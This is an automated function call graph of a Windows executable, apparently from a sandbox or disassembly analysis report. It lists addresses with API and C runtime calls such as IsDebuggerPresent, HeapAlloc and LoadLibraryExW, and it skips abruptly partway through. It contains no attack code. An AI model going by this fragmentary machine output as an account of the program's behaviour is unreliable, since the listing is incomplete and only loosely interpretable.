100602->100612 100604->100576 100605->100581 100606->100583 100607->100597 100608->100597 100610->100591 100611->100602 100612->100595 100613->100590 100614->100595 100615->100553 100617 27d3a 100616->100617 100619 27d43 _memmove 100616->100619 100617->100619 100620 27e4f 100617->100620 100619->100553 100621 27e62 100620->100621 100623 27e5f _memmove 100620->100623 100622 40db6 Mailbox 59 API calls 100621->100622 100622->100623 100623->100619 100625 27a5f 100624->100625 100629 27a85 _memmove 100624->100629 100626 40db6 Mailbox 59 API calls 100625->100626 100625->100629 100627 27ad4 100626->100627 100628 40db6 Mailbox 59 API calls 100627->100628 100628->100629 100629->100559 100630->100560 100631->100565 100633 27c5f __NMSG_WRITE 100632->100633 100634 28029 59 API calls 100633->100634 100635 27c70 
_memmove 100633->100635 100636 5ed07 _memmove 100634->100636 100635->100572 100637 47c56 100638 47c62 __mtinitlocknum 100637->100638 100674 49e08 GetStartupInfoW 100638->100674 100640 47c67 100676 48b7c GetProcessHeap 100640->100676 100642 47cbf 100643 47cca 100642->100643 100759 47da6 58 API calls 3 library calls 100642->100759 100677 49ae6 100643->100677 100646 47cd0 100647 47cdb __RTC_Initialize 100646->100647 100760 47da6 58 API calls 3 library calls 100646->100760 100698 4d5d2 100647->100698 100650 47cea 100651 47cf6 GetCommandLineW 100650->100651 100761 47da6 58 API calls 3 library calls 100650->100761 100717 54f23 GetEnvironmentStringsW 100651->100717 100654 47cf5 100654->100651 100657 47d10 100658 47d1b 100657->100658 100762 430b5 58 API calls 3 library calls 100657->100762 100727 54d58 100658->100727 100661 47d21 100662 47d2c 100661->100662 100763 430b5 58 API calls 3 library calls 100661->100763 100741 430ef 100662->100741 100665 47d34 100666 47d3f __wwincmdln 100665->100666 100764 430b5 58 API calls 3 library calls 100665->100764 100747 247d0 100666->100747 100669 47d53 100670 47d62 100669->100670 100765 43358 58 API calls _doexit 100669->100765 100766 430e0 58 API calls _doexit 100670->100766 100673 47d67 __mtinitlocknum 100675 49e1e 100674->100675 100675->100640 100676->100642 100767 43187 36 API calls 2 library calls 100677->100767 100679 49aeb 100768 49d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 100679->100768 100681 49af0 100682 49af4 100681->100682 100770 49d8a TlsAlloc 100681->100770 100769 49b5c 61 API calls 2 library calls 100682->100769 100685 49b06 100685->100682 100687 49b11 100685->100687 100686 49af9 100686->100646 100771 487d5 100687->100771 100690 49b53 100779 49b5c 61 API calls 2 library calls 100690->100779 100693 49b32 100693->100690 100695 49b38 100693->100695 100694 49b58 100694->100646 100778 49a33 58 API calls 4 library calls 100695->100778 100697 49b40 GetCurrentThreadId 100697->100646 100699 4d5de __mtinitlocknum 
100698->100699 100791 49c0b 100699->100791 100701 4d5e5 100702 487d5 __calloc_crt 58 API calls 100701->100702 100703 4d5f6 100702->100703 100704 4d661 GetStartupInfoW 100703->100704 100705 4d601 __mtinitlocknum @_EH4_CallFilterFunc@8 100703->100705 100706 4d7a5 100704->100706 100713 4d676 100704->100713 100705->100650 100707 4d86d 100706->100707 100710 4d7f2 GetStdHandle 100706->100710 100712 4d805 GetFileType 100706->100712 100799 49e2b InitializeCriticalSectionAndSpinCount 100706->100799 100800 4d87d LeaveCriticalSection _doexit 100707->100800 100709 487d5 __calloc_crt 58 API calls 100709->100713 100710->100706 100711 4d6c4 100711->100706 100714 4d6f8 GetFileType 100711->100714 100798 49e2b InitializeCriticalSectionAndSpinCount 100711->100798 100712->100706 100713->100706 100713->100709 100713->100711 100714->100711 100718 54f34 100717->100718 100719 47d06 100717->100719 100840 4881d 58 API calls 2 library calls 100718->100840 100723 54b1b GetModuleFileNameW 100719->100723 100721 54f5a _memmove 100722 54f70 FreeEnvironmentStringsW 100721->100722 100722->100719 100724 54b4f _wparse_cmdline 100723->100724 100726 54b8f _wparse_cmdline 100724->100726 100841 4881d 58 API calls 2 library calls 100724->100841 100726->100657 100728 54d71 __NMSG_WRITE 100727->100728 100732 54d69 100727->100732 100729 487d5 __calloc_crt 58 API calls 100728->100729 100737 54d9a __NMSG_WRITE 100729->100737 100730 54df1 100731 42d55 _free 58 API calls 100730->100731 100731->100732 100732->100661 100733 487d5 __calloc_crt 58 API calls 100733->100737 100734 54e16 100735 42d55 _free 58 API calls 100734->100735 100735->100732 100737->100730 100737->100732 100737->100733 100737->100734 100738 54e2d 100737->100738 100842 54607 58 API calls 2 library calls 100737->100842 100843 48dc6 IsProcessorFeaturePresent 100738->100843 100740 54e39 100740->100661 100742 430fb __IsNonwritableInCurrentImage 100741->100742 100866 4a4d1 100742->100866 100744 43119 __initterm_e 100746 43138 _doexit 
__IsNonwritableInCurrentImage 100744->100746 100869 42d40 100744->100869 100746->100665 100748 247ea 100747->100748 100758 24889 100747->100758 100749 24824 IsThemeActive 100748->100749 100904 4336c 100749->100904 100753 24850 100916 248fd SystemParametersInfoW SystemParametersInfoW 100753->100916 100755 2485c 100917 23b3a 100755->100917 100757 24864 SystemParametersInfoW 100757->100758 100758->100669 100759->100643 100760->100647 100761->100654 100765->100670 100766->100673 100767->100679 100768->100681 100769->100686 100770->100685 100774 487dc 100771->100774 100773 48817 100773->100690 100777 49de6 TlsSetValue 100773->100777 100774->100773 100776 487fa 100774->100776 100780 551f6 100774->100780 100776->100773 100776->100774 100788 4a132 Sleep 100776->100788 100777->100693 100778->100697 100779->100694 100781 55201 100780->100781 100786 5521c 100780->100786 100782 5520d 100781->100782 100781->100786 100789 48b28 58 API calls __getptd_noexit 100782->100789 100784 5522c HeapAlloc 100785 55212 100784->100785 100784->100786 100785->100774 100786->100784 100786->100785 100790 433a1 DecodePointer 100786->100790 100788->100776 100789->100785 100790->100786 100792 49c1c 100791->100792 100793 49c2f EnterCriticalSection 100791->100793 100801 49c93 100792->100801 100793->100701 100795 49c22 100795->100793 100825 430b5 58 API calls 3 library calls 100795->100825 100798->100711 100799->100706 100800->100705 100802 49c9f __mtinitlocknum 100801->100802 100803 49cc0 100802->100803 100804 49ca8 100802->100804 100818 49ce1 __mtinitlocknum 100803->100818 100829 4881d 58 API calls 2 library calls 100803->100829 100826 4a16b 58 API calls __NMSG_WRITE 100804->100826 100806 49cad 100827 4a1c8 58 API calls 5 library calls 100806->100827 100809 49cd5 100811 49cdc 100809->100811 100812 49ceb 100809->100812 100810 49cb4 100828 4309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100810->100828 100830 48b28 58 API calls __getptd_noexit 100811->100830 100815 49c0b __lock 
58 API calls 100812->100815 100816 49cf2 100815->100816 100819 49d17 100816->100819 100820 49cff 100816->100820 100818->100795 100832 42d55 100819->100832 100831 49e2b InitializeCriticalSectionAndSpinCount 100820->100831 100823 49d0b 100838 49d33 LeaveCriticalSection _doexit 100823->100838 100826->100806 100827->100810 100829->100809 100830->100818 100831->100823 100833 42d5e RtlFreeHeap 100832->100833 100834 42d87 __dosmaperr 100832->100834 100833->100834 100835 42d73 100833->100835 100834->100823 100839 48b28 58 API calls __getptd_noexit 100835->100839 100837 42d79 GetLastError 100837->100834 100838->100818 100839->100837 100840->100721 100841->100726 100842->100737 100844 48dd1 100843->100844 100849 48c59 100844->100849 100848 48dec 100848->100740 100850 48c73 _memset ___raise_securityfailure 100849->100850 100851 48c93 IsDebuggerPresent 100850->100851 100857 4a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 100851->100857 100854 48d57 ___raise_securityfailure 100858 4c5f6 100854->100858 100855 48d7a 100856 4a140 GetCurrentProcess TerminateProcess 100855->100856 100856->100848 100857->100854 100859 4c600 IsProcessorFeaturePresent 100858->100859 100860 4c5fe 100858->100860 100862 5590a 100859->100862 100860->100855 100865 558b9 5 API calls 2 library calls 100862->100865 100864 559ed 100864->100855 100865->100864 100867 4a4d4 EncodePointer 100866->100867 100867->100867 100868 4a4ee 100867->100868 100868->100744 100872 42c44 100869->100872 100871 42d4b 100871->100746 100873 42c50 __mtinitlocknum 100872->100873 100880 43217 100873->100880 100879 42c77 __mtinitlocknum 100879->100871 100881 49c0b __lock 58 API calls 100880->100881 100882 42c59 100881->100882 100883 42c88 DecodePointer DecodePointer 100882->100883 100884 42cb5 100883->100884 100885 42c65 100883->100885 100884->100885 100897 487a4 59 API calls 2 library calls 100884->100897 100894 42c82 100885->100894 100887 42d18 EncodePointer EncodePointer 100887->100885 100888 42cc7 100888->100887 100889 
42cec 100888->100889 100898 48864 61 API calls __realloc_crt 100888->100898 100889->100885 100893 42d06 EncodePointer 100889->100893 100899 48864 61 API calls __realloc_crt 100889->100899 100892 42d00 100892->100885 100892->100893 100893->100887 100900 43220 100894->100900 100897->100888 100898->100889 100899->100892 100903 49d75 LeaveCriticalSection 100900->100903 100902 42c87 100902->100879 100903->100902 100905 49c0b __lock 58 API calls 100904->100905 100906 43377 DecodePointer EncodePointer 100905->100906 100969 49d75 LeaveCriticalSection 100906->100969 100908 24849 100909 433d4 100908->100909 100910 433de 100909->100910 100911 433f8 100909->100911 100910->100911 100970 48b28 58 API calls __getptd_noexit 100910->100970 100911->100753 100913 433e8 100971 48db6 9 API calls __Wcsftime_l 100913->100971 100915 433f3 100915->100753 100916->100755 100918 23b47 __ftell_nolock 100917->100918 100972 27667 100918->100972 100922 23b7a IsDebuggerPresent 100923 5d272 MessageBoxA 100922->100923 100924 23b88 100922->100924 100925 5d28c 100923->100925 100924->100925 100926 23ba5 100924->100926 100959 23c61 100924->100959 101176 27213 59 API calls Mailbox 100925->101176 101058 27285 100926->101058 100927 23c68 SetCurrentDirectoryW 100930 23c75 Mailbox 100927->100930 100930->100757 100931 5d29c 100936 5d2b2 SetCurrentDirectoryW 100931->100936 100933 23bc3 GetFullPathNameW 100934 27bcc 59 API calls 100933->100934 100935 23bfe 100934->100935 101074 3092d 100935->101074 100936->100930 100959->100927 100969->100908 100970->100913 100971->100915 100973 40db6 Mailbox 59 API calls 100972->100973 100974 27688 100973->100974 100975 40db6 Mailbox 59 API calls 100974->100975 100976 23b51 GetCurrentDirectoryW 100975->100976 100977 23766 100976->100977 100978 27667 59 API calls 100977->100978 100979 2377c 100978->100979 101189 23d31 100979->101189 100981 2379a 100982 24706 61 API calls 100981->100982 100983 237ae 100982->100983 100984 27de1 59 API calls 100983->100984 100985 237bb 
100984->100985 101203 24ddd 100985->101203 100988 5d173 101270 8955b 100988->101270 100989 237dc Mailbox 100993 28047 59 API calls 100989->100993 100992 5d192 100995 42d55 _free 58 API calls 100992->100995 100996 237ef 100993->100996 100997 5d19f 100995->100997 101227 2928a 100996->101227 100999 24e4a 84 API calls 100997->100999 101002 5d1a8 100999->101002 101001 27de1 59 API calls 101003 23808 101001->101003 101005 23ed0 59 API calls 101002->101005 101230 284c0 101003->101230 101007 5d1c3 101005->101007 101006 2381a Mailbox 101008 27de1 59 API calls 101006->101008 101009 23ed0 59 API calls 101007->101009 101010 23840 101008->101010 101011 5d1df 101009->101011 101012 284c0 69 API calls 101010->101012 101013 24706 61 API calls 101011->101013 101015 2384f Mailbox 101012->101015 101014 5d204 101013->101014 101016 23ed0 59 API calls 101014->101016 101018 27667 59 API calls 101015->101018 101017 5d210 101016->101017 101019 28047 59 API calls 101017->101019 101020 2386d 101018->101020 101022 5d21e 101019->101022 101234 23ed0 101020->101234 101023 23ed0 59 API calls 101022->101023 101025 5d22d 101023->101025 101031 28047 59 API calls 101025->101031 101027 23887 101027->101002 101028 23891 101027->101028 101029 42efd _W_store_winword 60 API calls 101028->101029 101030 2389c 101029->101030 101030->101007 101032 238a6 101030->101032 101033 5d24f 101031->101033 101034 42efd _W_store_winword 60 API calls 101032->101034 101035 23ed0 59 API calls 101033->101035 101036 238b1 101034->101036 101037 5d25c 101035->101037 101036->101011 101038 238bb 101036->101038 101037->101037 101039 42efd _W_store_winword 60 API calls 101038->101039 101040 238c6 101039->101040 101040->101025 101041 23907 101040->101041 101043 23ed0 59 API calls 101040->101043 101041->101025 101042 23914 101041->101042 101250 292ce 101042->101250 101044 238ea 101043->101044 101046 28047 59 API calls 101044->101046 101048 238f8 101046->101048 101050 23ed0 59 API calls 101048->101050 101050->101041 101053 2928a 59 API 
calls 101055 2394f 101053->101055 101054 28ee0 60 API calls 101054->101055 101055->101053 101055->101054 101056 23ed0 59 API calls 101055->101056 101057 23995 Mailbox 101055->101057 101056->101055 101057->100922 101059 27292 __ftell_nolock 101058->101059 101060 5ea22 _memset 101059->101060 101061 272ab 101059->101061 101064 5ea3e GetOpenFileNameW 101060->101064 102135 24750 101061->102135 101065 5ea8d 101064->101065 101067 27bcc 59 API calls 101065->101067 101069 5eaa2 101067->101069 101069->101069 101071 272c9 102163 2686a 101071->102163 101075 3093a __ftell_nolock 101074->101075 102485 26d80 101075->102485 101077 3093f 101176->100931 101190 23d3e __ftell_nolock 101189->101190 101191 27bcc 59 API calls 101190->101191 101197 23ea4 Mailbox 101190->101197 101193 23d70 101191->101193 101202 23da6 Mailbox 101193->101202 101311 279f2 101193->101311 101194 279f2 59 API calls 101194->101202 101195 23e77 101196 27de1 59 API calls 101195->101196 101195->101197 101199 23e98 101196->101199 101197->100981 101198 27de1 59 API calls 101198->101202 101200 23f74 59 API calls 101199->101200 101200->101197 101202->101194 101202->101195 101202->101197 101202->101198 101314 23f74 101202->101314 101320 24bb5 101203->101320 101208 5d8e6 101211 24e4a 84 API calls 101208->101211 101209 24e08 LoadLibraryExW 101330 24b6a 101209->101330 101212 5d8ed 101211->101212 101214 24b6a 3 API calls 101212->101214 101216 5d8f5 101214->101216 101356 24f0b 101216->101356 101217 24e2f 101217->101216 101218 24e3b 101217->101218 101220 24e4a 84 API calls 101218->101220 101222 237d4 101220->101222 101222->100988 101222->100989 101224 5d91c 101364 24ec7 101224->101364 101226 5d929 101228 40db6 Mailbox 59 API calls 101227->101228 101229 237fb 101228->101229 101229->101001 101231 284cb 101230->101231 101233 284f2 101231->101233 101794 289b3 69 API calls Mailbox 101231->101794 101233->101006 101235 23ef3 101234->101235 101236 23eda 101234->101236 101237 27bcc 59 API calls 101235->101237 101238 28047 59 API calls 
101236->101238 101239 23879 101237->101239 101238->101239 101240 42efd 101239->101240 101241 42f7e 101240->101241 101242 42f09 101240->101242 101797 42f90 60 API calls 4 library calls 101241->101797 101249 42f2e 101242->101249 101795 48b28 58 API calls __getptd_noexit 101242->101795 101245 42f8b 101245->101027 101246 42f15 101796 48db6 9 API calls __Wcsftime_l 101246->101796 101248 42f20 101248->101027 101249->101027 101251 292d6 101250->101251 101252 40db6 Mailbox 59 API calls 101251->101252 101253 292e4 101252->101253 101255 23924 101253->101255 101798 291fc 59 API calls Mailbox 101253->101798 101256 29050 101255->101256 101799 29160 101256->101799 101258 40db6 Mailbox 59 API calls 101260 23932 101258->101260 101259 2905f 101259->101258 101259->101260 101261 28ee0 101260->101261 101262 5f17c 101261->101262 101265 28ef7 101261->101265 101262->101265 101809 28bdb 59 API calls Mailbox 101262->101809 101264 28fff 101264->101055 101265->101264 101266 29040 101265->101266 101267 28ff8 101265->101267 101808 29d3c 60 API calls Mailbox 101266->101808 101269 40db6 Mailbox 59 API calls 101267->101269 101269->101264 101271 24ee5 85 API calls 101270->101271 101272 895ca 101271->101272 101810 89734 101272->101810 101275 5d186 101275->100992 101305 24e4a 101275->101305 101276 24f0b 74 API calls 101277 895f7 101276->101277 101278 24f0b 74 API calls 101277->101278 101279 89607 101278->101279 101280 24f0b 74 API calls 101279->101280 101281 89622 101280->101281 101282 24f0b 74 API calls 101281->101282 101283 8963d 101282->101283 101284 24ee5 85 API calls 101283->101284 101285 89654 101284->101285 101286 4571c __crtLCMapStringA_stat 58 API calls 101285->101286 101287 8965b 101286->101287 101288 4571c __crtLCMapStringA_stat 58 API calls 101287->101288 101289 89665 101288->101289 101290 24f0b 74 API calls 101289->101290 101291 89679 101290->101291 101292 89109 GetSystemTimeAsFileTime 101291->101292 101293 8968c 101292->101293 101294 896a1 101293->101294 101295 896b6 101293->101295 
101296 42d55 _free 58 API calls 101294->101296 101297 8971b 101295->101297 101298 896bc 101295->101298 101299 896a7 101296->101299 101301 42d55 _free 58 API calls 101297->101301 101816 88b06 101298->101816 101302 42d55 _free 58 API calls 101299->101302 101301->101275 101302->101275 101304 42d55 _free 58 API calls 101304->101275 101306 24e54 101305->101306 101307 24e5b 101305->101307 101308 453a6 __fcloseall 83 API calls 101306->101308 101309 24e6a 101307->101309 101310 24e7b FreeLibrary 101307->101310 101308->101307 101309->100992 101310->101309 101312 27e4f 59 API calls 101311->101312 101313 279fd 101312->101313 101313->101193 101315 23f82 101314->101315 101316 23fa4 _memmove 101314->101316 101319 40db6 Mailbox 59 API calls 101315->101319 101317 40db6 Mailbox 59 API calls 101316->101317 101318 23fb8 101317->101318 101318->101202 101319->101316 101369 24c03 101320->101369 101323 24bdc 101325 24bf5 101323->101325 101326 24bec FreeLibrary 101323->101326 101324 24c03 2 API calls 101324->101323 101327 4525b 101325->101327 101326->101325 101373 45270 101327->101373 101329 24dfc 101329->101208 101329->101209 101531 24c36 101330->101531 101333 24c36 2 API calls 101336 24b8f 101333->101336 101334 24ba1 FreeLibrary 101335 24baa 101334->101335 101337 24c70 101335->101337 101336->101334 101336->101335 101338 40db6 Mailbox 59 API calls 101337->101338 101339 24c85 101338->101339 101535 2522e 101339->101535 101341 24c91 _memmove 101342 24ccc 101341->101342 101344 24dc1 101341->101344 101345 24d89 101341->101345 101343 24ec7 69 API calls 101342->101343 101351 24cd5 101343->101351 101549 8991b 95 API calls 101344->101549 101538 24e89 CreateStreamOnHGlobal 101345->101538 101348 24f0b 74 API calls 101348->101351 101350 24d69 101350->101217 101351->101348 101351->101350 101352 5d8a7 101351->101352 101544 24ee5 101351->101544 101353 24ee5 85 API calls 101352->101353 101354 5d8bb 101353->101354 101355 24f0b 74 API calls 101354->101355 101355->101350 101357 24f1d 101356->101357 101360 
5d9cd 101356->101360 101573 455e2 101357->101573 101361 89109 101771 88f5f 101361->101771 101363 8911f 101363->101224 101365 24ed6 101364->101365 101366 5d990 101364->101366 101776 45c60 101365->101776 101368 24ede 101368->101226 101370 24bd0 101369->101370 101371 24c0c LoadLibraryA 101369->101371 101370->101323 101370->101324 101371->101370 101372 24c1d GetProcAddress 101371->101372 101372->101370 101376 4527c __mtinitlocknum 101373->101376 101374 4528f 101422 48b28 58 API calls __getptd_noexit 101374->101422 101376->101374 101378 452c0 101376->101378 101377 45294 101423 48db6 9 API calls __Wcsftime_l 101377->101423 101392 504e8 101378->101392 101381 452c5 101382 452ce 101381->101382 101383 452db 101381->101383 101424 48b28 58 API calls __getptd_noexit 101382->101424 101384 45305 101383->101384 101385 452e5 101383->101385 101407 50607 101384->101407 101425 48b28 58 API calls __getptd_noexit 101385->101425 101389 4529f __mtinitlocknum @_EH4_CallFilterFunc@8 101389->101329 101393 504f4 __mtinitlocknum 101392->101393 101394 49c0b __lock 58 API calls 101393->101394 101405 50502 101394->101405 101395 50576 101427 505fe 101395->101427 101396 5057d 101432 4881d 58 API calls 2 library calls 101396->101432 101399 505f3 __mtinitlocknum 101399->101381 101400 50584 101400->101395 101433 49e2b InitializeCriticalSectionAndSpinCount 101400->101433 101403 49c93 __mtinitlocknum 58 API calls 101403->101405 101404 505aa EnterCriticalSection 101404->101395 101405->101395 101405->101396 101405->101403 101430 46c50 59 API calls __lock 101405->101430 101431 46cba LeaveCriticalSection LeaveCriticalSection _doexit 101405->101431 101416 50627 __wopenfile 101407->101416 101408 50641 101438 48b28 58 API calls __getptd_noexit 101408->101438 101410 507fc 101410->101408 101414 5085f 101410->101414 101411 50646 101439 48db6 9 API calls __Wcsftime_l 101411->101439 101413 45310 101426 45332 LeaveCriticalSection LeaveCriticalSection _fseek 101413->101426 101435 585a1 101414->101435 101416->101408 
101416->101410 101440 437cb 60 API calls 3 library calls 101416->101440 101418 507f5 101418->101410 101441 437cb 60 API calls 3 library calls 101418->101441 101420 50814 101420->101410 101442 437cb 60 API calls 3 library calls 101420->101442 101422->101377 101423->101389 101424->101389 101425->101389 101426->101389 101434 49d75 LeaveCriticalSection 101427->101434 101429 50605 101429->101399 101430->101405 101431->101405 101432->101400 101433->101404 101434->101429 101443 57d85 101435->101443 101437 585ba 101437->101413 101438->101411 101439->101413 101440->101418 101441->101420 101442->101410 101446 57d91 __mtinitlocknum 101443->101446 101444 57da7 101528 48b28 58 API calls __getptd_noexit 101444->101528 101446->101444 101448 57ddd 101446->101448 101447 57dac 101529 48db6 9 API calls __Wcsftime_l 101447->101529 101454 57e4e 101448->101454 101451 57df9 101530 57e22 LeaveCriticalSection __unlock_fhandle 101451->101530 101453 57db6 __mtinitlocknum 101453->101437 101455 57e6e 101454->101455 101456 444ea __wsopen_nolock 58 API calls 101455->101456 101459 57e8a 101456->101459 101457 48dc6 __invoke_watson 8 API calls 101458 585a0 101457->101458 101460 57d85 __wsopen_helper 103 API calls 101458->101460 101461 57ec4 101459->101461 101468 57ee7 101459->101468 101502 57fc1 101459->101502 101462 585ba 101460->101462 101463 48af4 __close 58 API calls 101461->101463 101462->101451 101464 57ec9 101463->101464 101465 48b28 __mtinitlocknum 58 API calls 101464->101465 101466 57ed6 101465->101466 101469 48db6 __Wcsftime_l 9 API calls 101466->101469 101467 57fa5 101470 48af4 __close 58 API calls 101467->101470 101468->101467 101475 57f83 101468->101475 101471 57ee0 101469->101471 101472 57faa 101470->101472 101471->101451 101473 48b28 __mtinitlocknum 58 API calls 101472->101473 101474 57fb7 101473->101474 101476 48db6 __Wcsftime_l 9 API calls 101474->101476 101477 4d294 __alloc_osfhnd 61 API calls 101475->101477 101476->101502 101478 58051 101477->101478 101479 5807e 101478->101479 
103309->103293 103309->103296 103309->103298 103309->103303 103309->103307 103309->103313 103316 29ea0 341 API calls 103309->103316 103317 28047 59 API calls 103309->103317 103319 28740 68 API calls __cinit 103309->103319 103320 28542 68 API calls 103309->103320 103322 2843a 68 API calls 103309->103322 103323 2cf7c 341 API calls 103309->103323 103324 29dda 59 API calls Mailbox 103309->103324 103325 2cf00 89 API calls 103309->103325 103326 2cd7d 341 API calls 103309->103326 103330 28a52 68 API calls 103309->103330 103331 29d3c 60 API calls Mailbox 103309->103331 103332 7678d 60 API calls 103309->103332 103313->103298 103334 89e4a 89 API calls 4 library calls 103313->103334 103316->103309 103317->103309 103319->103309 103320->103309 103321->103304 103322->103309 103323->103309 103324->103309 103325->103309 103326->103309 103327->103298 103328->103313 103329->103309 103330->103309 103331->103309 103332->103309 103333->103313 103334->103297 103335 5fdfc 103372 2ab30 Mailbox _memmove 103335->103372 103337 7617e Mailbox 59 API calls 103360 2a057 103337->103360 103341 60055 103571 89e4a 89 API calls 4 library calls 103341->103571 103345 2b475 103349 28047 59 API calls 103345->103349 103346 40db6 59 API calls Mailbox 103362 29f37 Mailbox 103346->103362 103347 28047 59 API calls 103347->103362 103348 60064 103349->103360 103352 2b47a 103352->103341 103361 609e5 103352->103361 103354 27667 59 API calls 103354->103362 103355 42d40 67 API calls __cinit 103355->103362 103356 76e8f 59 API calls 103356->103362 103357 27de1 59 API calls 103357->103372 103358 609d6 103576 89e4a 89 API calls 4 library calls 103358->103576 103577 89e4a 89 API calls 4 library calls 103361->103577 103362->103341 103362->103345 103362->103346 103362->103347 103362->103352 103362->103354 103362->103355 103362->103356 103362->103358 103362->103360 103363 2a55a 103362->103363 103564 2c8c0 341 API calls 2 library calls 103362->103564 103565 2b900 60 API calls Mailbox 103362->103565 103575 89e4a 89 API calls 
4 library calls 103363->103575 103364 9bc6b 341 API calls 103364->103372 103366 2b2b6 103569 2f6a3 341 API calls 103366->103569 103368 29ea0 341 API calls 103368->103372 103369 6086a 103573 29c90 59 API calls Mailbox 103369->103573 103371 60878 103574 89e4a 89 API calls 4 library calls 103371->103574 103372->103357 103372->103360 103372->103362 103372->103364 103372->103366 103372->103368 103372->103369 103372->103371 103374 6085c 103372->103374 103375 2b21c 103372->103375 103377 40db6 59 API calls Mailbox 103372->103377 103380 2b525 103372->103380 103381 76e8f 59 API calls 103372->103381 103386 8d07a 103372->103386 103433 31fc3 103372->103433 103473 9df23 103372->103473 103476 8d07b 103372->103476 103523 9c2e0 103372->103523 103555 87956 103372->103555 103561 7617e 103372->103561 103566 29c90 59 API calls Mailbox 103372->103566 103570 9c193 85 API calls 2 library calls 103372->103570 103374->103337 103374->103360 103567 29d3c 60 API calls Mailbox 103375->103567 103377->103372 103378 2b22d 103568 29d3c 60 API calls Mailbox 103378->103568 103572 89e4a 89 API calls 4 library calls 103380->103572 103381->103372 103387 8d09a 103386->103387 103388 8d0a5 103386->103388 103389 29b3c 59 API calls 103387->103389 103391 27667 59 API calls 103388->103391 103431 8d17f Mailbox 103388->103431 103389->103388 103390 40db6 Mailbox 59 API calls 103392 8d1c8 103390->103392 103393 8d0c9 103391->103393 103394 8d1d4 103392->103394 103579 257a6 60 API calls Mailbox 103392->103579 103395 27667 59 API calls 103393->103395 103397 29837 84 API calls 103394->103397 103398 8d0d2 103395->103398 103400 8d1ec 103397->103400 103399 29837 84 API calls 103398->103399 103401 8d0de 103399->103401 103402 257f6 67 API calls 103400->103402 103403 2459b 59 API calls 103401->103403 103404 8d1fb 103402->103404 103405 8d0f3 103403->103405 103406 8d1ff GetLastError 103404->103406 103407 8d233 103404->103407 103408 27b2e 59 API calls 103405->103408 103414 8d218 103406->103414 103409 8d25e 103407->103409 103410 
8d295 103407->103410 103411 8d126 103408->103411 103412 40db6 Mailbox 59 API calls 103409->103412 103415 40db6 Mailbox 59 API calls 103410->103415 103413 8d178 103411->103413 103419 83c37 3 API calls 103411->103419 103418 8d263 103412->103418 103417 29b3c 59 API calls 103413->103417 103429 8d188 Mailbox 103414->103429 103580 258ba CloseHandle 103414->103580 103416 8d29a 103415->103416 103423 27667 59 API calls 103416->103423 103416->103429 103417->103431 103421 8d274 103418->103421 103424 27667 59 API calls 103418->103424 103422 8d136 103419->103422 103581 9fbce 59 API calls 2 library calls 103421->103581 103422->103413 103425 8d13a 103422->103425 103423->103429 103424->103421 103426 27de1 59 API calls 103425->103426 103428 8d147 103426->103428 103578 83a2a 63 API calls Mailbox 103428->103578 103429->103372 103431->103390 103431->103429 103432 8d150 Mailbox 103432->103413 103434 29a98 59 API calls 103433->103434 103435 31fdb 103434->103435 103436 40db6 Mailbox 59 API calls 103435->103436 103440 66585 103435->103440 103438 31ff4 103436->103438 103439 32004 103438->103439 103597 257a6 60 API calls Mailbox 103438->103597 103443 29837 84 API calls 103439->103443 103441 32029 103440->103441 103601 8f574 59 API calls 103440->103601 103444 29b3c 59 API calls 103441->103444 103449 32036 103441->103449 103445 32012 103443->103445 103446 665cd 103444->103446 103447 257f6 67 API calls 103445->103447 103448 665d5 103446->103448 103446->103449 103450 32021 103447->103450 103451 29b3c 59 API calls 103448->103451 103452 25cdf 2 API calls 103449->103452 103450->103440 103450->103441 103600 258ba CloseHandle 103450->103600 103454 3203d 103451->103454 103452->103454 103455 665e7 103454->103455 103456 32057 103454->103456 103458 40db6 Mailbox 59 API calls 103455->103458 103457 27667 59 API calls 103456->103457 103459 3205f 103457->103459 103460 665ed 103458->103460 103582 25572 103459->103582 103462 66601 103460->103462 103602 25850 ReadFile SetFilePointerEx 103460->103602 103467 
66605 _memmove 103462->103467 103603 876c4 59 API calls 2 library calls 103462->103603 103464 3206e 103464->103467 103598 29a3c 59 API calls Mailbox 103464->103598 103468 32082 Mailbox 103469 320bc 103468->103469 103470 25c6f CloseHandle 103468->103470 103469->103372 103471 320b0 103470->103471 103471->103469 103599 258ba CloseHandle 103471->103599 103474 9cadd 130 API calls 103473->103474 103475 9df33 103474->103475 103475->103372 103477 8d09a 103476->103477 103478 8d0a5 103476->103478 103479 29b3c 59 API calls 103477->103479 103481 27667 59 API calls 103478->103481 103521 8d17f Mailbox 103478->103521 103479->103478 103480 40db6 Mailbox 59 API calls 103482 8d1c8 103480->103482 103483 8d0c9 103481->103483 103484 8d1d4 103482->103484 103608 257a6 60 API calls Mailbox 103482->103608 103485 27667 59 API calls 103483->103485 103487 29837 84 API calls 103484->103487 103488 8d0d2 103485->103488 103490 8d1ec 103487->103490 103489 29837 84 API calls 103488->103489 103491 8d0de 103489->103491 103492 257f6 67 API calls 103490->103492 103493 2459b 59 API calls 103491->103493 103494 8d1fb 103492->103494 103495 8d0f3 103493->103495 103496 8d1ff GetLastError 103494->103496 103497 8d233 103494->103497 103498 27b2e 59 API calls 103495->103498 103499 8d218 103496->103499 103500 8d25e 103497->103500 103501 8d295 103497->103501 103502 8d126 103498->103502 103511 8d188 Mailbox 103499->103511 103609 258ba CloseHandle 103499->103609 103503 40db6 Mailbox 59 API calls 103500->103503 103505 40db6 Mailbox 59 API calls 103501->103505 103504 8d178 103502->103504 103509 83c37 3 API calls 103502->103509 103508 8d263 103503->103508 103507 29b3c 59 API calls 103504->103507 103506 8d29a 103505->103506 103506->103511 103514 27667 59 API calls 103506->103514 103507->103521 103512 8d274 103508->103512 103515 27667 59 API calls 103508->103515 103513 8d136 103509->103513 103511->103372 103610 9fbce 59 API calls 2 library calls 103512->103610 103513->103504 103516 8d13a 103513->103516 103514->103511 
